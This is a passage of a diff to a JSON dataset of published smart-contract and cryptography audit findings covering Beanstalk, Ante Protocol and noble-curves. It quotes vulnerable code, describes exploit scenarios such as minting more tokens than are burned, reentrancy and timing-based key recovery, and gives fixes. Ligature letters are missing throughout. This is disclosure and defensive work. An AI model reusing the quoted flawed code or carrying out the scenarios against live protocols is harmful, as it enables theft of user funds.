ensure critical state-changing operations trigger events sucient to form an audit trail in the event of a system failure. Events should capture relevant parameters to help auditors determine the cause of failure. 3. Insu\u0000cient gas can cause AnteTests to produce false positives Severity: High Diculty: High Type: Data Validation Finding ID: TOB-ANTE-3 Target: contracts/AntePool.sol", + "title": "4. Risk of Fertilizer id collision that could result in loss of funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "If a user mints Fertilizer tokens twice during two dierent seasons, the same token id for both tokens could be calculated, and the rst entry will be overridden; if this occurs and the bpf value changes, the user would be entitled to less yield than expected. To mint new Fertilizer tokens, users call the mintFertilizer() function in the FertilizerFacet contract. An id is calculated for each new Fertilizer token that is minted; not only is this id an identier for the token, but it also represents the endBpf period, which is the moment at which the Fertilizer reaches maturity and can be redeemed without incurring any penalty. function mintFertilizer( uint128 amount, uint256 minLP, LibTransfer.From mode ) external payable { uint256 remaining = LibFertilizer.remainingRecapitalization(); uint256 _amount = uint256(amount); if (_amount > remaining) _amount = remaining; LibTransfer.receiveToken( C.usdc(), uint256(amount).mul(1e6), msg.sender, mode ); uint128 id = LibFertilizer.addFertilizer( uint128(s.season.current), amount, minLP ); C.fertilizer().beanstalkMint(msg.sender, uint256(id), amount, s.bpf); } Figure 4.1: The mintFertilizer() function in Fertilizer.sol#L35-55 The id is calculated by the addFertilizer() function in the LibFertilizer library as the sum of 1 and the bpf and humidity values. function addFertilizer( uint128 season, uint128 amount, uint256 minLP ) internal returns (uint128 id) { AppStorage storage s = LibAppStorage.diamondStorage(); uint256 _amount = uint256(amount); // Calculate Beans Per Fertilizer and add to total owed uint128 bpf = getBpf(season); s.unfertilizedIndex = s.unfertilizedIndex.add( _amount.mul(uint128(bpf)) ); // Get id id = s.bpf.add(bpf); [...] } function getBpf(uint128 id) internal pure returns (uint128 bpf) { bpf = getHumidity(id).add(1000).mul(PADDING); } function getHumidity(uint128 id) internal pure returns (uint128 humidity) { if (id == REPLANT_SEASON) return 5000; if (id >= END_DECREASE_SEASON) return 200; uint128 humidityDecrease = id.sub(REPLANT_SEASON + 1).mul(5); humidity = RESTART_HUMIDITY.sub(humidityDecrease); } Figure 4.2: The id calculation in LibFertilizer.sol#L32-67 However, the method that generates these token id s does not prevent collisions. The bpf value is always increasing (or does not move), and humidity decreases every season until it reaches 20%. This makes it possible for a user to mint two tokens in two dierent seasons with dierent bpf and humidity values and still get the same token id . function beanstalkMint(address account, uint256 id, uint128 amount, uint128 bpf) external onlyOwner { _balances[id][account].lastBpf = bpf; _safeMint( account, id, amount, bytes('0') ); } Figure 4.3: The beanstalkMint() function in Fertilizer.sol#L40-48 An id collision is not necessarily a problem; however, when a token is minted, the value of the lastBpf eld is set to the bpf of the current season, as shown in gure 4.3. This eld is very important because it is used to determine the penalty, if any, that a user will incur when redeeming Fertilizer. To redeem Fertilizer, users call the claimFertilizer() function, which in turn calls the beanstalkUpdate() function on the Fertilizer contract. function claimFertilized(uint256[] calldata ids, LibTransfer.To mode) external payable { } uint256 amount = C.fertilizer().beanstalkUpdate(msg.sender, ids, s.bpf); LibTransfer.sendToken(C.bean(), amount, msg.sender, mode); Figure 4.4: The claimFertilizer() function in FertilizerFacet.sol#L27-33 function beanstalkUpdate( address account, uint256[] memory ids, uint128 bpf ) external onlyOwner returns (uint256) { return __update(account, ids, uint256(bpf)); } function __update( address account, uint256[] memory ids, uint256 bpf ) internal returns (uint256 beans) { for (uint256 i = 0; i < ids.length; i++) { uint256 stopBpf = bpf < ids[i] ? bpf : ids[i]; uint256 deltaBpf = stopBpf - _balances[ids[i]][account].lastBpf; if (deltaBpf > 0) { beans = beans.add(deltaBpf.mul(_balances[ids[i]][account].amount)); _balances[ids[i]][account].lastBpf = uint128(stopBpf); } } emit ClaimFertilizer(ids, beans); } Figure 4.5: The update ow in Fertilizer.sol#L32-38 and L72-86 The beanstalkUpdate() function then calls the __update() function. This function rst calculates the stopBpf value, which is one of two possible values. If the Fertilizer is being redeemed early, stopBpf is the bpf at which the Fertilizer is being redeemed; if the token is being redeemed at maturity or later, stopBpf is the token id (i.e., the endBpf value). Afterward, __update() calculates the deltaBpf value, which is used to determine the penalty, if any, that the user will incur when redeeming the token; deltaBpf is calculated using the stopBpf value that was already dened and the lastBpf value, which is the bpf corresponding to the last time the token was redeemed or, if it was never redeemed, the bpf at the moment the token was minted. Finally, the tokens lastBpf eld is updated to the stopBpf . Because of the id collision, users could accidentally mint Fertilizer tokens with the same id in two dierent seasons and override their rst mints lastBpf eld, ultimately reducing the amount of yield they are entitled to. Exploit Scenario Imagine the following scenario: It is currently the rst season; the bpf is 0 and the humidity is 40%. Alice mints 100 Fertilizer tokens with an id of 41 (the sum of 1 and the bpf ( 0 ) and humidity ( 40 ) values), and lastBpf is set to 0 . Some time goes by, and it is now the third season; the bpf is 35 and the humidity is 5%. Alice mints one additional Fertilizer token with an id of 41 (the sum of 1 and the bpf ( 35 ) and humidity ( 5 ) values), and lastBpf is set to 35 . Because of the second mint, the lastBpf eld of Alices Fertilizer tokens is overridden, making her lose a substantial amount of the yield she was entitled to: Using the formula for calculating the number of BEAN tokens that users are entitled to, shown in gure 4.5, Alices original yield at maturity would have been 4,100 tokens: deltaBpf = id - lastBpf = 41 - 0 = 41 balance = 100 beans received = deltaBpf * balance = 41 * 100 = 4100 As a result of the overridden lastBpf eld, Alices yield instead ends up being only 606 tokens: deltaBpf = id - lastBpf = 41 - 35 = 6 balance = 101 beans received = deltaBpf * balance = 6 * 101 = 606 Recommendations Short term, separate the role of the id into two separate variables for the token index and endBpf . That way, the index can be optimized to prevent collisions, while endBpf can accurately represent the data it needs to represent. Alternatively, modify the relevant code so that when an id collision occurs, it either reverts or redeems the previous Fertilizer rst before minting the new tokens. However, these alternate remedies could introduce new edge cases or could result in a degraded user experience; if either alternate remedy is implemented, it would need to be thoroughly documented to inform the users of its particular behavior. Long term, thoroughly document the expected behavior of the associated code and include regression tests to prevent similar issues from being introduced in the future. Additionally, exercise caution when using one variable to serve two purposes. Gas savings should be measured and weighed against the increased complexity. Developers should be aware that performing optimizations could introduce new edge cases and increase the codes complexity.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: High", "Difficulty: Low" ] }, { - "title": "4. Looping over an array of unbounded size can cause a denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", - "body": "If an AnteTest fails, the _checkTestNoRevert function will return false, causing the checkTest function to call _calculateChallengerEligibility to compute eligibleAmount; this value is the total stake of the eligible challengers and is used to calculate the proportion of _remainingStake owed to each challenger. To calculate eligibleAmount, the _calculateChallengerEligibility function loops through an unbounded array of challenger addresses. When the number of challengers is large, the function will consume a large quantity of gas in this operation. function _calculateChallengerEligibility() internal { uint256 cutoffBlock = failedBlock.sub(CHALLENGER_BLOCK_DELAY); for (uint256 i = 0; i < challengers.addresses.length; i++) { address challenger = challengers.addresses[i]; if (eligibilityInfo.lastStakedBlock[challenger] < cutoffBlock) { eligibilityInfo.eligibleAmount = eligibilityInfo.eligibleAmount.add( _storedBalance(challengerInfo.userInfo[challenger], challengerInfo) ); } } } Figure 4.1: contracts/AntePool.sol#L553-L563 However, triggering an out-of-gas error would be costly to an attacker; the attacker would need to create many accounts through which to stake funds, and the amount of each stake would decay over time. Exploit Scenario The length of the challenger address array grows such that the computation of the eligibleAmount causes the block to reach its gas limit. Then, because of this Ethereum-imposed gas constraint, the entire transaction reverts, and the failing AnteTest is not marked as failing. As a result, challengers who have staked funds in anticipation of a failed test will not receive a payout. Recommendations Short term, determine the number of challengers that can enter an AntePool without rendering the _calculateChallengerEligibility functions operation too gas intensive; then, use that number as the upper limit on the number of challengers. Long term, avoid calculating every challengers proportion of _remainingStake in the same operation; instead, calculate each user's pro-rata share when he or she enters the pool and modify the challenger delay to require that a challenger register and wait 12 blocks before minting his or her pro-rata share. Upon a test failure, a challenger would burn these shares and redeem them for ether.", + "title": "5. The sunrise() function rewards callers only with the base incentive ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "The increasing incentive that encourages users to call the sunrise() function in a timely manner is not actually applied. According to the Beanstalk white paper, the reward paid to users who call the sunrise() function should increase by 1% every second (for up to 300 seconds) after this method is eligible to be called; this incentive is designed so that, even when gas prices are high, the system can move on to the next season in a timely manner. This increasing incentive is calculated and included in the emitted logs, but it is not actually applied to the number of Bean tokens rewarded to users who call sunrise() . function incentivize ( address account , uint256 amount ) private { uint256 timestamp = block.timestamp .sub( s.season.start.add(s.season.period.mul(season())) ); if (timestamp > 300 ) timestamp = 300 ; uint256 incentive = LibIncentive.fracExp(amount, 100 , timestamp, 1 ); C.bean().mint(account, amount ); emit Incentivization(account, incentive ); } Figure 5.1: The incentive calculation in SeasonFacet.sol#70-78 Exploit Scenario Gas prices suddenly increase to the point that it is no longer protable to call sunrise() . Given the lack of an increasing incentive, the function goes uncalled for several hours, preventing the system from reacting to changing market conditions. Recommendations Short term, pass the incentive value instead of amount into the mint() function call. Long term, thoroughly document the expected behavior of the SeasonFacet contract and the properties (invariants) it should enforce, such as the caller of the sunrise() function receives the right incentive. Expand the unit test suite to test that these properties hold. Additionally, thoroughly document how the system would be aected if the sunrise() function were not called for a long period of time (e.g., in times of extreme network congestion). Finally, determine whether the Beanstalk team should rely exclusively on third parties to call the sunrise() function or whether an alternate system managed by the Beanstalk team should be adopted in addition to the current system. For example, an alternate system could involve an o-chain monitoring system and a trusted execution ow.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "2. Events emitted during critical operations omit certain details ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", - "body": "Events are generally emitted for all critical state-changing operations within the system. However, the AntePoolCreated event emitted by the AntePoolFactory does not capture the address of the msg.sender that deployed the AntePool. This information would help provide a more complete audit trail in the event of an attack, as the msg.sender often refers to the externally owned account that sent the transaction but could instead refer to an intermediate smart contract address. emit AntePoolCreated(testAddr, testPool); Figure 2.1: contracts/AntePoolFactory.sol#L47 Additionally, consider having the AntePool.updateDecay method emit an event with the pool share parameters used in decay calculations. Recommendations Short term, capture the msg.sender in the AntePoolFactory.AntePoolCreated event, and have AntePool.updateDecay emit an event that includes the relevant decay calculation parameters. Long term, ensure critical state-changing operations trigger events sucient to form an audit trail in the event of a system failure. Events should capture relevant parameters to help auditors determine the cause of failure.", + "title": "6. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "Beanstalk has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the Beanstalk contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: Low" ] }, { - "title": "3. Insu\u0000cient gas can cause AnteTests to produce false positives ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", - "body": "Once challengers have staked ether and the challenger delay has passed, they can submit transactions to predict that a test will fail and to earn a bonus if it does. An attacker could manipulate the result of an AnteTest by providing a limited amount of gas to the checkTest function, forcing the test to fail. This is because the anteTest.checkTestPasses function receives 63/64 of the gas provided to checkTest (per the 63/64 gas forwarding rule), which may not be enough. This issue stems from the use of a try-catch statement in the _checkTestNoRevert function, which causes the function to return false when an EVM exception occurs, indicating a test failure. We set the diculty of this nding to high, as the outer call will also revert with an out-of-gas exception if it requires more than 1/64 of the gas; however, other factors (e.g., the block gas limit) may change in the future, allowing for a successful exploitation. if (!_checkTestNoRevert()) { updateDecay(); verifier = msg.sender; failedBlock = block.number; pendingFailure = true; _calculateChallengerEligibility(); _bounty = getVerifierBounty(); uint256 totalStake = stakingInfo.totalAmount.add(withdrawInfo.totalAmount); _remainingStake = totalStake.sub(_bounty); Figure 3.1: Part of the checkTest function /// @return passes bool if the Ante Test passed function _checkTestNoRevert() internal returns (bool) { try anteTest.checkTestPasses() returns (bool passes) { return passes; } catch { return false; } } Figure 3.2: contracts/AntePool.sol#L567-L573 Exploit Scenario An attacker calculates the amount of gas required for checkTest to run out of gas in the inner call to anteTest.checkTestPasses. The test fails, and the attacker claims the verier bonus. Recommendations Short term, ensure that the AntePool reverts if the underlying AnteTest does not have enough gas to return a meaningful value. Long term, redesign the test verication mechanism such that gas usage does not cause false positives.", + "title": "7. Lack of support for external transfers of nonstandard ERC20 tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "For external transfers of nonstandard ERC20 tokens via the TokenFacet contract, the code uses the standard transferFrom operation from the given token contract without checking the operations returndata ; as a result, successfully executed transactions that fail to transfer tokens will go unnoticed, causing confusion in users who believe their funds were successfully transferred. The TokenFacet contract exposes transferToken() , an external function that users can call to transfer ERC20 tokens both to and from the contract and between users. function transferToken( IERC20 token, address recipient, uint256 amount, LibTransfer.From fromMode, LibTransfer.To toMode ) external payable { LibTransfer.transferToken(token, recipient, amount, fromMode, toMode); } Figure 7.1: The transferToken() function in TokenFacet.sol#L39-47 This function calls the LibTransfer library, which handles the token transfer. function transferToken( IERC20 token, address recipient, uint256 amount, From fromMode, To toMode ) internal returns (uint256 transferredAmount) { if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) { token.transferFrom(msg.sender, recipient, amount); return amount; } amount = receiveToken(token, amount, msg.sender, fromMode); sendToken(token, amount, recipient, toMode); return amount; } Figure 7.2: The transferToken() function in LibTransfer.sol#L29-43 The LibTransfer library uses the fromMode and toMode values to determine a transfers sender and receiver, respectively; in most cases, it uses the safeERC20 library to execute transfers. However, if fromMode and toMode are both marked as EXTERNAL , then the transferFrom function of the token contract will be called directly, and safeERC20 will not be used. Essentially, if a user tries to transfer a nonstandard ERC20 token that does not revert on failure and instead indicates a transactions success or failure in its return data, the user could be led to believe that failed token transfers were successful. Exploit Scenario Alice uses the TokenFacet contract to transfer nonstandard ERC20 tokens that return false on failure to another contract. However, Alice accidentally inputs an amount higher than her balance. The transaction is successfully executed, but because there is no check of the false return value, Alice does not know that her tokens were not transferred. Recommendations Short term, use the safeERC20 library for external token transfers. Long term, thoroughly review and document all interactions with arbitrary tokens to prevent similar issues from being introduced in the future.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: Low" ] }, { - "title": "5. Reentrancy into AntePool.checkTest scales challenger eligibility amount ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", - "body": "A malicious AnteTest or underlying contract being tested can trigger multiple failed checkTest calls by reentering the AntePool.checkTest function. With each call, the _calculateChallengerEligibility method increases the eligibleAmount instead of resetting it, causing the eligibleAmount to scale unexpectedly with each reentrancy. function checkTest() external override testNotFailed { require(challengers.exists(msg.sender), \"ANTE: Only challengers can checkTest\"); require( block.number.sub(eligibilityInfo.lastStakedBlock[msg.sender]) > CHALLENGER_BLOCK_DELAY, \"ANTE: must wait 12 blocks after challenging to call checkTest\" ); numTimesVerified = numTimesVerified.add(1); lastVerifiedBlock = block.number; emit TestChecked(msg.sender); if (!_checkTestNoRevert()) { updateDecay(); verifier = msg.sender; failedBlock = block.number; pendingFailure = true; _calculateChallengerEligibility(); _bounty = getVerifierBounty(); uint256 totalStake = stakingInfo.totalAmount.add(withdrawInfo.totalAmount); _remainingStake = totalStake.sub(_bounty); emit FailureOccurred(msg.sender); } } Figure 5.1: contracts/AntePool.sol#L292-L316 function _calculateChallengerEligibility() internal { uint256 cutoffBlock = failedBlock.sub(CHALLENGER_BLOCK_DELAY); for (uint256 i = 0; i < challengers.addresses.length; i++) { address challenger = challengers.addresses[i]; if (eligibilityInfo.lastStakedBlock[challenger] < cutoffBlock) { eligibilityInfo.eligibleAmount = eligibilityInfo.eligibleAmount.add( _storedBalance(challengerInfo.userInfo[challenger], challengerInfo) ); } } } Figure 5.2: contracts/AntePool.sol#L553-L563 Appendix D includes a proof-of-concept AnteTest contract and hardhat unit test that demonstrate this issue. Exploit Scenario An attacker deploys an AnteTest contract or a vulnerable contract to be tested. The attacker directs the deployed contract to call AntePool.stake, which registers the contract as a challenger. The malicious contract then reenters AntePool.checkTest and triggers multiple failures within the same call stack. As a result, the AntePool makes multiple calls to the _calculateChallengerEligibility method, which increases the challenger eligibility amount with each call. This results in a greater-than-expected loss of pool funds. Recommendations Short term, implement checks to ensure the AntePool contracts methods cannot be reentered while checkTest is executing. Long term, ensure that all calls to external contracts are reviewed for reentrancy risks. To prevent a reentrancy from causing undened behavior in the system, ensure state variables are updated in the appropriate order; alternatively (and if sensible) disallow reentrancy altogether. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "8. Plot transfers from users with allowances revert if the owner has an existing pod listing ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "Whenever a plot transfer is executed by a user with an allowance (i.e., a transfer in which the caller was approved by the plots owner), the transfer will revert if there is an existing listing for the pods contained in that plot. The MarketplaceFacet contract exposes a function, transferPlot() , that allows the owner of a plot to transfer the pods in that plot to another user; additionally, the owner of a plot can call the approvePods() function (gure 8.1) to approve other users to transfer these pods on the owners behalf. function approvePods(address spender, uint256 amount) external payable nonReentrant { } require(spender != address(0), \"Field: Pod Approve to 0 address.\"); setAllowancePods(msg.sender, spender, amount); emit PodApproval(msg.sender, spender, amount); Figure 8.1: The approvePods() function in MarketplaceFacet.sol#L147-155 Once approved, the given address can call the transferPlot() function to transfer pods on the owners behalf. The function checks and decreases the allowance and then checks whether there is an existing pod listing for the target pods. If there is an existing listing, the function tries to cancel it by calling the _cancelPodListing() function. function transferPlot( address sender, address recipient, uint256 id, uint256 start, uint256 end ) external payable nonReentrant { require( sender != address(0) && recipient != address(0), \"Field: Transfer to/from 0 address.\" ); uint256 amount = s.a[sender].field.plots[id]; require(amount > 0, \"Field: Plot not owned by user.\"); require(end > start && amount >= end, \"Field: Pod range invalid.\"); amount = end - start; // Note: SafeMath is redundant here. if ( msg.sender != sender && allowancePods(sender, msg.sender) != uint256(-1) ) { decrementAllowancePods(sender, msg.sender, amount); } if (s.podListings[id] != bytes32(0)) { _cancelPodListing(id); // TODO: Look into this cancelling. } _transferPlot(sender, recipient, id, start, amount); } Figure 8.2: The transferPlot() function in MarketplaceFacet.sol#L119-145 The _cancelPodListing() function receives only an id as the input and relies on the msg.sender to determine the listings owner. However, if the transfer is executed by a user with an allowance, the msg.sender is the user who was granted the allowance, not the owner of the listing. As a result, the function will revert. function _cancelPodListing(uint256 index) internal { require( s.a[msg.sender].field.plots[index] > 0, \"Marketplace: Listing not owned by sender.\" ); delete s.podListings[index]; emit PodListingCancelled(msg.sender, index); } Figure 8.3: The _cancelPodListing() function in Listing.sol#L149-156 Exploit Scenario A new smart contract that integrates with the MarketplaceFacet contract is deployed. This contract has features allowing it to manage users pods on their behalf. Alice approves the contract so that it can manage her pods. Some time passes, and Alice calls one of the smart contracts functions, which requires Alice to transfer ownership of her plot to the contract. Because Alice has already approved the smart contract, it can perform the transfer on her behalf. To do so, it calls the transferPlot() function in the MarketplaceFacet contract; however, this call reverts because Alice has an open listing for the pods that the contract is trying to transfer. Recommendations Short term, add a new input to _cancelPodListing() that is equal to msg.sender if the caller is the owner of the listing, but equal to the pod owner if the caller is a user who was approved by the owner. Long term, thoroughly document the expected behavior of the MarketplaceFacet contract and the properties (invariants) it should enforce, such as plot transfers initiated by users with an allowance cancel the owners listing. Expand the unit test suite to test that these properties hold.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "1. Timing issues ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf", - "body": "The library provides a scalar multiplication routine that aims to keep the number of BigInteger operations constant, in order to be (close to) constant-time. However, there are some locations in the implementation where timing dierences can cause issues: Pre-computed point look-up during scalar multiplication (gure 1.1) Second part of signature generation Tonelli-Shanks square root computation // Check if we're onto Zero point. // Add random point inside current window to f. const offset1 = offset; const offset2 = offset + Math .abs(wbits) - 1 ; // -1 because we skip zero const cond1 = window % 2 !== 0 ; const cond2 = wbits < 0 ; if (wbits === 0 ) { // The most important part for const-time getPublicKey f = f.add(constTimeNegate(cond1, precomputes[offset1])); } else { p = p.add(constTimeNegate(cond2, precomputes[offset2])); } Figure 1.1: Pre-computed point lookup during scalar multiplication ( noble-curves/src/abstract/curve.ts:117128 ) The scalar multiplication routine comprises a loop, part of which is shown in Figure 1.1. Each iteration adds a selected pre-computed point to the accumulator p (or to the dummy accumulator f if relevant scalar bits are all zero). However, the array access to select the appropriate pre-computed point is not constant-time. Figure 1.2 shows how the implementation computes the second half of an ECDSA signature. 14 noble-curves Security Assessment const s = modN(ik * modN(m + modN(d * r))); // s = k^-1(m + rd) mod n Figure 1.2: Generation of the second part of the signature ( noble-curves/src/abstract/weierstrass.ts:988 ) First, the private key is multiplied by the rst half of the signature and reduced modulo the group order. Next, the message digest is added and the result is again reduced modulo the group order. If the modulo operation is not constant-time, and if an attacker can detect this timing dierence, they can perform a lattice attack to recover the signing key. The details of this attack are described in the TCHES 2019 article by Ryan . Note that the article does not show that this timing dierence attack can be practically exploited, but instead mounts a cache-timing attack to exploit it. FpSqrt is a function that computes square roots of quadratic residues over . Based on , this function chooses one of several sub-algorithms, including the value of Tonelli-Shanks. Some of these algorithms are constant-time with respect to , but some are not. In particular, the implementation of the Tonelli-Shanks algorithm has a high degree of timing variability. The FpSqrt function is used to decode compressed point representations, so it can inuence timing when handling potentially sensitive or adversarial data. Most texts consider Tonelli-Shanks the fallback algorithm when a faster or simpler algorithm is unavailable. However, Tonelli-Shanks can be used for any prime modulus Further, Tonelli-Shanks can be made constant time for a given value of . . Timing leakage threats can be reduced by modifying the Tonelli-Shanks code to run in constant time (see here ), and making the constant-time implementation the default square root algorithm. Special-case algorithms can be broken out into separate functions (whether constant- or variable-time), for use when the modulus is known to work, or timing attacks are not a concern. Exploit Scenario An attacker interacts with a user of the library and measures the time it takes to execute signature generation or ECDH key exchange. In the case of static ECDH, the attacker may provide dierent public keys to be multiplied with the static private key of the library user. In the case of ECDSA, the attacker may get the user to repeatedly sign the same message, which results in scalar multiplications on the base point using the same deterministically generated nonce. The attacker can subsequently average the obtained execution times for operations with the same input to gain more precise timing estimates. Then, the attacker uses the obtained execution times to mount a timing attack: 15 noble-curves Security Assessment In the case of ECDSA, the attacker may attempt to mount the attack from the TCHES 2019 article by Ryan . However, it is unknown whether this attack will work in practice when based purely on timing. In the case of static ECDH, the attacker may attempt to mount a recursive attack, similar to the attacks described in the Cardis 1998 article by Dhem et al. or the JoCE 2013 article by Danger et al. Note that the timing dierences caused by the precomputed point look-up may not be sucient to mount such a timing attack. The attacker would need to nd other timing dierences, such as dierences in the point addition routines based on one of the input points. The fact that the library uses a complete addition formula increases the diculty, but there could still be timing dierences caused by the underlying big integer arithmetic. Determining whether such timing attacks are practically applicable to the library (and how many executions they would need) requires a large number of measurements on a dedicated benchmarking system, which was not done as part of this engagement. Recommendations Short term, consider adding scalar randomization to primitives where the same private scalar can be used multiple times, such as ECDH and deterministic ECDSA. To mitigate the attack from the TCHES 2019 article by Ryan , consider either blinding the private scalar in the signature computation or removing the modular reduction of = ( * ( + * )) , i.e., . Long term, ensure that all low-level operations are constant-time. References Return of the Hidden Number Problem, Ryan, TCHES 2019 A Practical Implementation of the Timing Attack, Dhem et al., Cardis 1998 A synthesis of side-channel attacks on elliptic curve cryptography in smart-cards, Danger et al., JoCE 2013 16 noble-curves Security Assessment", + "title": "9. Users can sow more Bean tokens than are burned ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "An accounting error allows users to sow more Bean tokens than the available soil allows. Whenever the price of Bean is below its peg, the protocol issues soil. Soil represents the willingness of the protocol to take Bean tokens o the market in exchange for a pod. Essentially, Bean owners loan their tokens to the protocol and receive pods in exchange. We can think of pods as non-callable bonds that mature on a rst-in-rst-out (FIFO) basis as the protocol issues new Bean tokens. Whenever soil is available, users can call the sow() and sowWithMin() functions in the FieldFacet contract. function sowWithMin( uint256 amount, uint256 minAmount, LibTransfer.From mode ) public payable returns (uint256) { uint256 sowAmount = s.f.soil; require( sowAmount >= minAmount && amount >= minAmount && minAmount > 0, \"Field: Sowing below min or 0 pods.\" ); if (amount < sowAmount) sowAmount = amount; return _sow(sowAmount, mode); } Figure 9.1: The sowWithMin() function in FieldFacet.sol#L41-53 The sowWithMin() function ensures that there is enough soil to sow the given number of Bean tokens and that the call will not sow fewer tokens than the specied minAmount . Once it makes these checks, it calls the _sow() function. function _sow(uint256 amount, LibTransfer.From mode) internal returns (uint256 pods) { pods = LibDibbler.sow(amount, msg.sender); if (mode == LibTransfer.From.EXTERNAL) C.bean().burnFrom(msg.sender, amount); else { amount = LibTransfer.receiveToken(C.bean(), amount, msg.sender, mode); C.bean().burn(amount); } } Figure 9.2: The _sow() function in FieldFacet.sol#L55-65 The _sow() function rst calculates the number of pods that will be sown by calling the sow() function in the LibDibbler library, which performs the internal accounting and calculates the number of pods that the user is entitled to. function sow(uint256 amount, address account) internal returns (uint256) { AppStorage storage s = LibAppStorage.diamondStorage(); // We can assume amount <= soil from getSowAmount s.f.soil = s.f.soil - amount ; return sowNoSoil(amount, account); } function sowNoSoil(uint256 amount, address account) internal returns (uint256) { } AppStorage storage s = LibAppStorage.diamondStorage(); uint256 pods = beansToPods(amount, s.w.yield); sowPlot(account, amount, pods); s.f.pods = s.f.pods.add(pods) ; saveSowTime(); return pods; function sowPlot( address account, uint256 beans, uint256 pods ) private { AppStorage storage s = LibAppStorage.diamondStorage(); s.a[account].field.plots[s.f.pods] = pods; emit Sow(account, s.f.pods, beans, pods); } Figure 9.3: The sow() , sowNoSoil() , and sowPlot() functions in LibDibbler.sol#L41-53 Finally, the sowWithMin() function burns the Bean tokens from the callers account, removing them from the supply. To do so, the function calls burnFrom() if the mode parameter is EXTERNAL (i.e., if the Bean tokens to be burned are not escrowed in the contract) and burn() if the Bean tokens are escrowed. If the mode parameter is not EXTERNAL , the receiveToken() function is executed to update the internal accounting of the contract before burning the tokens. This function returns the number of tokens that were transferred into the contract. In essence, the receiveToken() function allows the contract to correctly account for token transfers into it and to manage internal balances without performing token transfers. function receiveToken( IERC20 token, uint256 amount, address sender, From mode ) internal returns (uint256 receivedAmount) { if (amount == 0) return 0; if (mode != From.EXTERNAL) { receivedAmount = LibBalance.decreaseInternalBalance( sender, token, amount, mode != From.INTERNAL ); if (amount == receivedAmount || mode == From.INTERNAL_TOLERANT) return receivedAmount; } token.safeTransferFrom(sender, address(this), amount - receivedAmount); return amount; } Figure 9.4: The receiveToken() function in FieldFacet.sol#L41-53 However, if the mode parameter is INTERNAL_TOLERANT , the contract allows the user to partially ll amount (i.e., to transfer as much as the user can), which means that if the user does not own the given amount of Bean tokens, the protocol simply burns as many tokens as the user owns but still allows the user to sow the full amount . Exploit Scenario Eve, a malicious user, spots the vulnerability in the FieldFacet contract and waits until Bean is below its peg and the protocol starts issuing soil. Bean nally goes below its peg, and the protocol issues 1,000 soil. Eve deposits a single Bean token into the contract by calling the transferToken() function in the TokenFacet contract. She then calls the sow() function with amount equal to 1000 and mode equal to INTERNAL_TOLERANT . The sow() function is executed, sowing 1,000 Bean tokens but burning only a single token. Recommendations Short term, modify the relevant code so that users Bean tokens are burned before the accounting for the soil and pods are updated and so that, if the mode eld is not EXTERNAL , the amount returned by receiveToken() is used as the input to LibDibbler.sow() . Long term, thoroughly document the expected behavior of the FieldFacet contract and the properties (invariants) it should enforce, such as the sow() function always sows as many Bean tokens as were burned. Expand the unit test suite to test that these properties hold.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "10. Pods may never ripen ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "Whenever the price of Bean is below its peg, the protocol takes Bean tokens o the market in exchange for a number of p ods dependent on the current interest rate. Essentially, Bean owners loan their tokens to the protocol and receive pods in exchange. We can think of pods as loans that are repaid on a FIFO basis as the protocol issues new Bean tokens. A group of pods that are created together is called a plot. The queue of plots is referred to as the pod line. The pod line has no practical bound on its length, so during periods of decreasing demand, it can grow indenitely. No yield is awarded until the given plot owner is rst in line and until the price of Bean is above its value peg. While the protocol does not default on its debt, the only way for pods to ripen is if demand increases enough for the price of Bean to be above its value peg for some time. While the price of Bean is above its peg, a portion of newly minted Bean tokens is used to repay the rst plot in the pod line until fully repaid, decreasing the length of the pod line. During an extended period of decreasing supply, the pod line could grow long enough that lenders receive an unappealing time-weighted rate of return, even if the yield is increased; a suciently long pod line could encourage usersuncertain of 